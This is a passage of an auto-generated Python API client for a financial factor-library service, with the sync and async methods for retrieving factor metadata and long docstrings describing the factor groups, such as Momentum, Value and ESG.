) -> typing.Tuple[LibraryResponse, int, typing.MutableMapping]:
"""Retrieve a list of all available factors with relevant meta data. # noqa: E501
Fetch the list of all available factors and related meta data. # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Keyword Args:
            factors ([str]): Array of individual Factor Items requested for the library endpoint. Use the factorGroups parameter to pull a full list of factors based on the input group. [optional]
            factor_groups ([str]): Fetch a collection of Factors that fall within one of the below \"groups\". For example, requesting factorGroup=Momentum will return all factors under the momentum group. To know which items are available in each group use the /library endpoint. ***factor groups limit** = 5 factor groups per request* ### Classification and Reference |Group|Descriptions| |---|---| |Asset_Data|Easily input security-level metadata into your quantitative research process. Common metrics used include Days Since Report, Days to Report, ADR Flag, and Minimum Lot Size. Integrate variables from FactSet Reference, FactSet Fundamentals, and FactSet Estimates databases to impose portfolio constraints and access general reference data.| |Country|Evaluate securities based on the countries in which they have the highest exposure. Analyze company-level exposures across various countries and measure how concentrated a firm’s business is within their countries of operation. Metrics are derived from FactSet Reference and FactSet Geographic Revenue Exposure (GeoRev) databases and include Country Exposure, Country of Incorporation, and Country of Risk.| |Industry|Classify securities based on the industries in which they generate the majority of their revenues. Incorporate variables from the FactSet Revere Business and Industry Classification System (RBICS) database to measure how concentrated a firm’s business is within the industries they operate and across various sub-sectors. Common metrics include Industry Classifications, Industry Exposures, and Industry Concentration.| |Size|Assess how large or small a company is relative to industry peers. Create size buckets and clarify the systematic portion of company returns using variables from FactSet Prices, FactSet RBICS, FactSet Fundamentals, and FactSet Estimates. Common metrics include Size Classification, Enterprise Value, and Market Share.| ### Market Factors |Group|Descriptions| |---|---| |Liquidity|Assess how investible a security is, as well as the potential market impact of a trade using signals built off pricing and volume data from FactSet Prices. Integrate factors as components into your alpha models to evaluate systematic risk or input them into your portfolio construction models to dictate how much of an asset can be bought or sold based on liquidity levels. Common metrics include Average Dollars Traded, Share Turnover, and Bid Ask Spread.| |Market Sensitivity|Clarify the common variations in stock returns attributable to the performance of their local market indices. Leverage regressions performed between security-level and market-index returns across different return horizons and methodologies. Metrics are derived from FactSet Prices and include Beta R-Squared, Up Market Beta, and Down Market Beta.| |Momentum|Analyze the historical momentum of a security and uncover how each underlying data item, calculation, and horizon can be meaningful in different situations. Metrics are derived from FactSet Prices and include 52W Position, Return Momentum, and Velocity.| |Technical|Forecast the direction of future price movements based on historical market data and leverage heuristic or pattern-based signals from FactSet Prices. Common metrics include Average True Range, Ulcer Performance Index, and Money Flow Volume.| |Volatility|Measure the uncertainty in asset price movements with indicators from the FactSet Prices database. Capture various forms of uncertainty by employing statistical calculations on security performance data. 
Common metrics include Return Volatility, Semivariance, and Turbulence.| ### Core Fundamentals |Group|Descriptions| |---|---| |Efficiency|Leverage core financial data to determine how effectively a company uses its assets, collects payments, and operates its business. Most variables are measured as turnover ratios and include changes over time to provide transparency into the efficiency of each business process. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Asset Turnover, Receivables Turnover, and Cash Conversion Cycle.| |Growth|Measure a company’s ability to grow faster than its peers. Compare the future expected growth of a company with its historical growth and view growth rates adjusted for stability. Integrate variables from FactSet RBICS, FactSet Fundamentals, and FactSet Estimates to analyze growth rates over multiple horizons including Market Share, Sales, and EPS Growth.| |Management|Gain insight into how management finances their business and the decisions they make that impact the core financial statements. These choices are reflected in changes to total debt or equity, the overall size of the balance sheet, and decisions around the accounting methods used. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Capital Expenditures (CAPEX) Growth, Equity Buyback Ratio, and Depreciation & Amortization Variability.| |Profitability|Evaluate a company’s ability to generate income relative to its revenue or balance sheet metrics. Identify lucrative businesses relative to their industry, region, and size profile. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Return on Assets, Return on Invested Capital Change, and Return on Total Equity.| |Quality|Understand the overall financial health and quality of a company’s business. Use historical data from FactSet Fundamentals to analyze balance sheet health, stability of earnings and profit margins, variability in cash flows, and trends that look beyond headline financial metrics. Common metrics include Cash Earnings Ratio Variability, Revenue Stability, and Accruals Ratios. Composite quality scores (i.e., the Piotroski F-Score, Beneish M-Score, and Altman Z-Score) and their underlying components are also available as individual metrics.| |Solvency|Measure a company’s ability to meet their short- and long-term financial obligations and determine the degree of leverage employed to run their business. Incorporate financial ratios from FactSet Fundamentals and FactSet Estimates to quantify liability or debt obligation relative to earnings, cash flows, equities, or items from the asset side of the balance sheet. Common metrics include Current Ratio, Current Asset Liquidity, and Debt to Equity Change.| |Value|Quickly determine how cheap or expensive a company is based on common security-level characteristics from FactSet Prices, FactSet Fundamentals, and FactSet Estimates. Apply factors as an intersection between other factors for a more customized analysis, such as finding the cheapest stocks among the highest quality companies. Common metrics include Earnings Yield, Book to Price, and Revenue to Enterprise Value.| ### Macro and Cross-Asset |Group|Descriptions| |---|---| |Commodity|Quantify the impact movements in the commodity markets have on equity prices. 
Metrics are derived from FactSet Prices and allow you to measure company-level exposure to commodities such as Gold, Crude Oil, Coffee, and Live Cattle.| |FX_Sensitivity|Analyze security-level sensitivity to fluctuations in the currency markets. Metrics are derived from FactSet Prices and allow you to identify company exposures to currencies such as USD, EUR, JPY, and CNY.| |Debt|Uncover details related to company debt through issuer-level factor exposures. Use the FactSet Fixed Income Prices & Derived Analytics database to aggregate metrics at the company level. Common metrics include Effective Duration, Option Adjusted Spread, and Yield to Worst.| |Economic|Capture daily security exposures to leading economic indicator forecasts. Leverage the Quant Factor Library’s detailed country exposure model to attribute economic measures to individual companies. Metrics are derived from FactSet Economic Estimates and include Real GDP Growth, Industrial Production Growth, Core CPI Inflation, and Policy Rates.| ### Alternative |Group|Descriptions| |---|---| |Analyst_Sentiment|Analyze a security’s outlook from the perspective of a sell-side research analyst. Leverage consensus estimates data from the FactSet Estimates database to analyze the directional change in estimate revisions for various financial statement items and time periods. Common metrics include Sales Estimate Revisions, Free Cash Flow Estimate Revisions, and Robust Estimate Revisions.| |Corporate_Governance|Identify companies with strong corporate governance. Analyze the profile of a company’s management and board based on tenure, diversity, compensation incentives, and more factors from the FactSet People database. Common metrics include Management - Average Age, Board - Activist Member, and Executives - Average Bonus.| |Crowding|Understand the degree to which investors own, purchase, or sell a security. View characteristics of each investor’s profile and characterize crowding from passive, active, institutional, ETF, and hedge fund investors. Use metrics from FactSet Ownership, FactSet Prices, and FactSet Fundamentals to help identify potential effects of crowding such as whether certain investor types are acquiring or divesting from a given security. Common metrics include Active Buyer Percent of Portfolio Change, ETF Days to Liquidate, and Hedge Fund Percent Outstanding.| |Insider_Activity|Measure the degree to which insiders own, purchase, or sell their company’s stock. Analyze the sentiment of those with access to material non-public information or determine how the amount of insider ownership may impact management’s key business decisions. Metrics are derived from FactSet Ownership and include Insider Percent Outstanding, Insider Number of Buys, and Insider Seller Position Change.| |ESG|Analyze Environmental, Social and Governance (ESG) behavior, which is aggregated and categorized into continuously updated, material ESG scores to uncover risks and opportunities from companies. Truvalue Labs focuses on company ESG behavior from external sources and includes both positive and negative events that go beyond traditional sources of ESG risk data. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
LibraryResponse
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
return self.get_factor_library_endpoint.call_with_http_info(**kwargs)
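    # Editorial sketch (not generated code): the *_with_http_info variant returns a
    # (data, status, headers) triple rather than the bare LibraryResponse, e.g.
    # (continuing the hypothetical client from the sketch above):
    #
    #   data, status, headers = api.get_factor_library_with_http_info(
    #       factor_groups=["Momentum"])
    #   assert status == 200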
def get_factor_library_async(
self,
**kwargs
) -> "ApplyResult[LibraryResponse]":
"""Retrieve a list of all available factors with relevant meta data. # noqa: E501
Fetch the list of all available factors and related meta data. # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Keyword Args:
            factors ([str]): Array of individual Factor Items requested for the library endpoint. Use the factorGroups parameter to pull a full list of factors based on the input group. [optional]
            factor_groups ([str]): Fetch a collection of Factors that fall within one of the below \"groups\". For example, requesting factorGroup=Momentum will return all factors under the momentum group. To know which items are available in each group use the /library endpoint. ***factor groups limit** = 5 factor groups per request* ### Classification and Reference |Group|Descriptions| |---|---| |Asset_Data|Easily input security-level metadata into your quantitative research process. Common metrics used include Days Since Report, Days to Report, ADR Flag, and Minimum Lot Size. Integrate variables from FactSet Reference, FactSet Fundamentals, and FactSet Estimates databases to impose portfolio constraints and access general reference data.| |Country|Evaluate securities based on the countries in which they have the highest exposure. Analyze company-level exposures across various countries and measure how concentrated a firm’s business is within their countries of operation. Metrics are derived from FactSet Reference and FactSet Geographic Revenue Exposure (GeoRev) databases and include Country Exposure, Country of Incorporation, and Country of Risk.| |Industry|Classify securities based on the industries in which they generate the majority of their revenues. Incorporate variables from the FactSet Revere Business and Industry Classification System (RBICS) database to measure how concentrated a firm’s business is within the industries they operate and across various sub-sectors. Common metrics include Industry Classifications, Industry Exposures, and Industry Concentration.| |Size|Assess how large or small a company is relative to industry peers. Create size buckets and clarify the systematic portion of company returns using variables from FactSet Prices, FactSet RBICS, FactSet Fundamentals, and FactSet Estimates. Common metrics include Size Classification, Enterprise Value, and Market Share.| ### Market Factors |Group|Descriptions| |---|---| |Liquidity|Assess how investible a security is, as well as the potential market impact of a trade using signals built off pricing and volume data from FactSet Prices. Integrate factors as components into your alpha models to evaluate systematic risk or input them into your portfolio construction models to dictate how much of an asset can be bought or sold based on liquidity levels. Common metrics include Average Dollars Traded, Share Turnover, and Bid Ask Spread.| |Market Sensitivity|Clarify the common variations in stock returns attributable to the performance of their local market indices. Leverage regressions performed between security-level and market-index returns across different return horizons and methodologies. Metrics are derived from FactSet Prices and include Beta R-Squared, Up Market Beta, and Down Market Beta.| |Momentum|Analyze the historical momentum of a security and uncover how each underlying data item, calculation, and horizon can be meaningful in different situations. Metrics are derived from FactSet Prices and include 52W Position, Return Momentum, and Velocity.| |Technical|Forecast the direction of future price movements based on historical market data and leverage heuristic or pattern-based signals from FactSet Prices. Common metrics include Average True Range, Ulcer Performance Index, and Money Flow Volume.| |Volatility|Measure the uncertainty in asset price movements with indicators from the FactSet Prices database. Capture various forms of uncertainty by employing statistical calculations on security performance data. 
Common metrics include Return Volatility, Semivariance, and Turbulence.| ### Core Fundamentals |Group|Descriptions| |---|---| |Efficiency|Leverage core financial data to determine how effectively a company uses its assets, collects payments, and operates its business. Most variables are measured as turnover ratios and include changes over time to provide transparency into the efficiency of each business process. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Asset Turnover, Receivables Turnover, and Cash Conversion Cycle.| |Growth|Measure a company’s ability to grow faster than its peers. Compare the future expected growth of a company with its historical growth and view growth rates adjusted for stability. Integrate variables from FactSet RBICS, FactSet Fundamentals, and FactSet Estimates to analyze growth rates over multiple horizons including Market Share, Sales, and EPS Growth.| |Management|Gain insight into how management finances their business and the decisions they make that impact the core financial statements. These choices are reflected in changes to total debt or equity, the overall size of the balance sheet, and decisions around the accounting methods used. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Capital Expenditures (CAPEX) Growth, Equity Buyback Ratio, and Depreciation & Amortization Variability.| |Profitability|Evaluate a company’s ability to generate income relative to its revenue or balance sheet metrics. Identify lucrative businesses relative to their industry, region, and size profile. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Return on Assets, Return on Invested Capital Change, and Return on Total Equity.| |Quality|Understand the overall financial health and quality of a company’s business. Use historical data from FactSet Fundamentals to analyze balance sheet health, stability of earnings and profit margins, variability in cash flows, and trends that look beyond headline financial metrics. Common metrics include Cash Earnings Ratio Variability, Revenue Stability, and Accruals Ratios. Composite quality scores (i.e., the Piotroski F-Score, Beneish M-Score, and Altman Z-Score) and their underlying components are also available as individual metrics.| |Solvency|Measure a company’s ability to meet their short- and long-term financial obligations and determine the degree of leverage employed to run their business. Incorporate financial ratios from FactSet Fundamentals and FactSet Estimates to quantify liability or debt obligation relative to earnings, cash flows, equities, or items from the asset side of the balance sheet. Common metrics include Current Ratio, Current Asset Liquidity, and Debt to Equity Change.| |Value|Quickly determine how cheap or expensive a company is based on common security-level characteristics from FactSet Prices, FactSet Fundamentals, and FactSet Estimates. Apply factors as an intersection between other factors for a more customized analysis, such as finding the cheapest stocks among the highest quality companies. Common metrics include Earnings Yield, Book to Price, and Revenue to Enterprise Value.| ### Macro and Cross-Asset |Group|Descriptions| |---|---| |Commodity|Quantify the impact movements in the commodity markets have on equity prices. 
Metrics are derived from FactSet Prices and allow you to measure company-level exposure to commodities such as Gold, Crude Oil, Coffee, and Live Cattle.| |FX_Sensitivity|Analyze security-level sensitivity to fluctuations in the currency markets. Metrics are derived from FactSet Prices and allow you to identify company exposures to currencies such as USD, EUR, JPY, and CNY.| |Debt|Uncover details related to company debt through issuer-level factor exposures. Use the FactSet Fixed Income Prices & Derived Analytics database to aggregate metrics at the company level. Common metrics include Effective Duration, Option Adjusted Spread, and Yield to Worst.| |Economic|Capture daily security exposures to leading economic indicator forecasts. Leverage the Quant Factor Library’s detailed country exposure model to attribute economic measures to individual companies. Metrics are derived from FactSet Economic Estimates and include Real GDP Growth, Industrial Production Growth, Core CPI Inflation, and Policy Rates.| ### Alternative |Group|Descriptions| |---|---| |Analyst_Sentiment|Analyze a security’s outlook from the perspective of a sell-side research analyst. Leverage consensus estimates data from the FactSet Estimates database to analyze the directional change in estimate revisions for various financial statement items and time periods. Common metrics include Sales Estimate Revisions, Free Cash Flow Estimate Revisions, and Robust Estimate Revisions.| |Corporate_Governance|Identify companies with strong corporate governance. Analyze the profile of a company’s management and board based on tenure, diversity, compensation incentives, and more factors from the FactSet People database. Common metrics include Management - Average Age, Board - Activist Member, and Executives - Average Bonus.| |Crowding|Understand the degree to which investors own, purchase, or sell a security. View characteristics of each investor’s profile and characterize crowding from passive, active, institutional, ETF, and hedge fund investors. Use metrics from FactSet Ownership, FactSet Prices, and FactSet Fundamentals to help identify potential effects of crowding such as whether certain investor types are acquiring or divesting from a given security. Common metrics include Active Buyer Percent of Portfolio Change, ETF Days to Liquidate, and Hedge Fund Percent Outstanding.| |Insider_Activity|Measure the degree to which insiders own, purchase, or sell their company’s stock. Analyze the sentiment of those with access to material non-public information or determine how the amount of insider ownership may impact management’s key business decisions. Metrics are derived from FactSet Ownership and include Insider Percent Outstanding, Insider Number of Buys, and Insider Seller Position Change.| |ESG|Analyze Environmental, Social and Governance (ESG) behavior, which is aggregated and categorized into continuously updated, material ESG scores to uncover risks and opportunities from companies. Truvalue Labs focuses on company ESG behavior from external sources and includes both positive and negative events that go beyond traditional sources of ESG risk data. [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[LibraryResponse]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
return self.get_factor_library_endpoint.call_with_http_info(**kwargs)
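    # Editorial sketch (not generated code): the *_async variant dispatches the
    # request to a worker and returns a multiprocessing.pool.ApplyResult; call
    # .get() to block for the LibraryResponse (continuing the hypothetical client
    # from the sketch above):
    #
    #   pending = api.get_factor_library_async(factor_groups=["Momentum"])
    #   response = pending.get()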
def get_factor_library_with_http_info_async(
self,
**kwargs
) -> "ApplyResult[typing.Tuple[LibraryResponse, int, typing.MutableMapping]]":
"""Retrieve a list of all available factors with relevant meta data. # noqa: E501
Fetch the list of all available factors and related meta data. # noqa: E501
This method makes a asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Keyword Args:
            factors ([str]): Array of individual Factor Items requested for the library endpoint. Use the factorGroups parameter to pull a full list of factors based on the input group. [optional]
factor_groups ([str]): Fetch a collection of Factors that fall within one of the below \"groups\". For example, requesting factorGroup=Momentum will return all factors under the momentum group. To know which items are available in each group, use the /library endpoint. **Factor groups limit = 5 factor groups per request.**
### Classification and Reference
|Group|Descriptions|
|---|---|
|Asset_Data|Easily input security-level metadata into your quantitative research process. Common metrics used include Days Since Report, Days to Report, ADR Flag, and Minimum Lot Size. Integrate variables from FactSet Reference, FactSet Fundamentals, and FactSet Estimates databases to impose portfolio constraints and access general reference data.|
|Country|Evaluate securities based on the countries in which they have the highest exposure. Analyze company-level exposures across various countries and measure how concentrated a firm’s business is within their countries of operation. Metrics are derived from FactSet Reference and FactSet Geographic Revenue Exposure (GeoRev) databases and include Country Exposure, Country of Incorporation, and Country of Risk.|
|Industry|Classify securities based on the industries in which they generate the majority of their revenues. Incorporate variables from the FactSet Revere Business and Industry Classification System (RBICS) database to measure how concentrated a firm’s business is within the industries they operate and across various sub-sectors. Common metrics include Industry Classifications, Industry Exposures, and Industry Concentration.|
|Size|Assess how large or small a company is relative to industry peers. Create size buckets and clarify the systematic portion of company returns using variables from FactSet Prices, FactSet RBICS, FactSet Fundamentals, and FactSet Estimates. Common metrics include Size Classification, Enterprise Value, and Market Share.|
### Market Factors
|Group|Descriptions|
|---|---|
|Liquidity|Assess how investible a security is, as well as the potential market impact of a trade, using signals built off pricing and volume data from FactSet Prices. Integrate factors as components into your alpha models to evaluate systematic risk, or input them into your portfolio construction models to dictate how much of an asset can be bought or sold based on liquidity levels. Common metrics include Average Dollars Traded, Share Turnover, and Bid Ask Spread.|
|Market Sensitivity|Clarify the common variations in stock returns attributable to the performance of their local market indices. Leverage regressions performed between security-level and market-index returns across different return horizons and methodologies. Metrics are derived from FactSet Prices and include Beta R-Squared, Up Market Beta, and Down Market Beta.|
|Momentum|Analyze the historical momentum of a security and uncover how each underlying data item, calculation, and horizon can be meaningful in different situations. Metrics are derived from FactSet Prices and include 52W Position, Return Momentum, and Velocity.|
|Technical|Forecast the direction of future price movements based on historical market data and leverage heuristic or pattern-based signals from FactSet Prices. Common metrics include Average True Range, Ulcer Performance Index, and Money Flow Volume.|
|Volatility|Measure the uncertainty in asset price movements with indicators from the FactSet Prices database. Capture various forms of uncertainty by employing statistical calculations on security performance data. Common metrics include Return Volatility, Semivariance, and Turbulence.|
### Core Fundamentals
|Group|Descriptions|
|---|---|
|Efficiency|Leverage core financial data to determine how effectively a company uses its assets, collects payments, and operates its business. Most variables are measured as turnover ratios and include changes over time to provide transparency into the efficiency of each business process. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Asset Turnover, Receivables Turnover, and Cash Conversion Cycle.|
|Growth|Measure a company’s ability to grow faster than its peers. Compare the future expected growth of a company with its historical growth and view growth rates adjusted for stability. Integrate variables from FactSet RBICS, FactSet Fundamentals, and FactSet Estimates to analyze growth rates over multiple horizons, including Market Share, Sales, and EPS Growth.|
|Management|Gain insight into how management finances their business and the decisions they make that impact the core financial statements. These choices are reflected in changes to total debt or equity, the overall size of the balance sheet, and decisions around the accounting methods used. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Capital Expenditures (CAPEX) Growth, Equity Buyback Ratio, and Depreciation & Amortization Variability.|
|Profitability|Evaluate a company’s ability to generate income relative to its revenue or balance sheet metrics. Identify lucrative businesses relative to their industry, region, and size profile. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Return on Assets, Return on Invested Capital Change, and Return on Total Equity.|
|Quality|Understand the overall financial health and quality of a company’s business. Use historical data from FactSet Fundamentals to analyze balance sheet health, stability of earnings and profit margins, variability in cash flows, and trends that look beyond headline financial metrics. Common metrics include Cash Earnings Ratio Variability, Revenue Stability, and Accruals Ratios. Composite quality scores (i.e., the Piotroski F-Score, Beneish M-Score, and Altman Z-Score) and their underlying components are also available as individual metrics.|
|Solvency|Measure a company’s ability to meet their short- and long-term financial obligations and determine the degree of leverage employed to run their business. Incorporate financial ratios from FactSet Fundamentals and FactSet Estimates to quantify liability or debt obligation relative to earnings, cash flows, equities, or items from the asset side of the balance sheet. Common metrics include Current Ratio, Current Asset Liquidity, and Debt to Equity Change.|
|Value|Quickly determine how cheap or expensive a company is based on common security-level characteristics from FactSet Prices, FactSet Fundamentals, and FactSet Estimates. Apply factors as an intersection between other factors for a more customized analysis, such as finding the cheapest stocks among the highest quality companies. Common metrics include Earnings Yield, Book to Price, and Revenue to Enterprise Value.|
### Macro and Cross-Asset
|Group|Descriptions|
|---|---|
|Commodity|Quantify the impact movements in the commodity markets have on equity prices. Metrics are derived from FactSet Prices and allow you to measure company-level exposure to commodities such as Gold, Crude Oil, Coffee, and Live Cattle.|
|FX_Sensitivity|Analyze security-level sensitivity to fluctuations in the currency markets. Metrics are derived from FactSet Prices and allow you to identify company exposures to currencies such as USD, EUR, JPY, and CNY.|
|Debt|Uncover details related to company debt through issuer-level factor exposures. Use the FactSet Fixed Income Prices & Derived Analytics database to aggregate metrics at the company level. Common metrics include Effective Duration, Option Adjusted Spread, and Yield to Worst.|
|Economic|Capture daily security exposures to leading economic indicator forecasts. Leverage the Quant Factor Library’s detailed country exposure model to attribute economic measures to individual companies. Metrics are derived from FactSet Economic Estimates and include Real GDP Growth, Industrial Production Growth, Core CPI Inflation, and Policy Rates.|
### Alternative
|Group|Descriptions|
|---|---|
|Analyst_Sentiment|Analyze a security’s outlook from the perspective of a sell-side research analyst. Leverage consensus estimates data from the FactSet Estimates database to analyze the directional change in estimate revisions for various financial statement items and time periods. Common metrics include Sales Estimate Revisions, Free Cash Flow Estimate Revisions, and Robust Estimate Revisions.|
|Corporate_Governance|Identify companies with strong corporate governance. Analyze the profile of a company’s management and board based on tenure, diversity, compensation incentives, and more factors from the FactSet People database. Common metrics include Management - Average Age, Board - Activist Member, and Executives - Average Bonus.|
|Crowding|Understand the degree to which investors own, purchase, or sell a security. View characteristics of each investor’s profile and characterize crowding from passive, active, institutional, ETF, and hedge fund investors. Use metrics from FactSet Ownership, FactSet Prices, and FactSet Fundamentals to help identify potential effects of crowding, such as whether certain investor types are acquiring or divesting from a given security. Common metrics include Active Buyer Percent of Portfolio Change, ETF Days to Liquidate, and Hedge Fund Percent Outstanding.|
|Insider_Activity|Measure the degree to which insiders own, purchase, or sell their company’s stock. Analyze the sentiment of those with access to material non-public information or determine how the amount of insider ownership may impact management’s key business decisions. Metrics are derived from FactSet Ownership and include Insider Percent Outstanding, Insider Number of Buys, and Insider Seller Position Change.|
|ESG|Analyze Environmental, Social and Governance (ESG) behavior, which is aggregated and categorized into continuously updated, material ESG scores to uncover risks and opportunities from companies. Truvalue Labs focuses on company ESG behavior from external sources and includes both positive and negative events that go beyond traditional sources of ESG risk data.|
[optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(LibraryResponse, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
return self.get_factor_library_endpoint.call_with_http_info(**kwargs)
def get_factor_library_list(
self,
library_request,
**kwargs
) -> LibraryResponse:
"""Retrieves a list of all available factors with relevant meta data. # noqa: E501
Fetch the list of all available factors and related meta data. # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Args:
library_request (LibraryRequest): Available Factors and Related Meta Data.
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
LibraryResponse
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
kwargs['library_request'] = \
library_request
return self.get_factor_library_list_endpoint.call_with_http_info(**kwargs)
def get_factor_library_list_with_http_info(
self,
library_request,
**kwargs
) -> typing.Tuple[LibraryResponse, int, typing.MutableMapping]:
"""Retrieves a list of all available factors with relevant meta data. # noqa: E501
Fetch the list of all available factors and related meta data. # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Args:
library_request (LibraryRequest): Available Factors and Related Meta Data.
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
LibraryResponse
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
kwargs['library_request'] = \
library_request
return self.get_factor_library_list_endpoint.call_with_http_info(**kwargs)
def get_factor_library_list_async(
self,
library_request,
**kwargs
) -> "ApplyResult[LibraryResponse]":
"""Retrieves a list of all available factors with relevant meta data. # noqa: E501
Fetch the list of all available factors and related meta data. # noqa: E501
This method makes an asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Args:
library_request (LibraryRequest): Available Factors and Related Meta Data.
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[LibraryResponse]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
kwargs['library_request'] = \
library_request
return self.get_factor_library_list_endpoint.call_with_http_info(**kwargs)
def get_factor_library_list_with_http_info_async(
self,
library_request,
**kwargs
) -> "ApplyResult[typing.Tuple[LibraryResponse, int, typing.MutableMapping]]":
"""Retrieves a list of all available factors with relevant meta data. # noqa: E501
Fetch the list of all available factors and related meta data. # noqa: E501
This method makes an asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
Args:
library_request (LibraryRequest): Available Factors and Related Meta Data.
Keyword Args:
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
ApplyResult[(LibraryResponse, int, typing.Dict)]
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
kwargs['library_request'] = \
library_request
return self.get_factor_library_list_endpoint.call_with_http_info(**kwargs)
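# --- Usage sketch (illustrative, not part of the generated client) --------
# A minimal example of calling the factor library endpoints defined above.
# The Configuration/ApiClient wiring and the FactorLibraryApi class name are
# assumptions based on the usual OpenAPI-generator layout; only
# LibraryRequest and the get_factor_library_list* methods are taken from
# this module itself.
#
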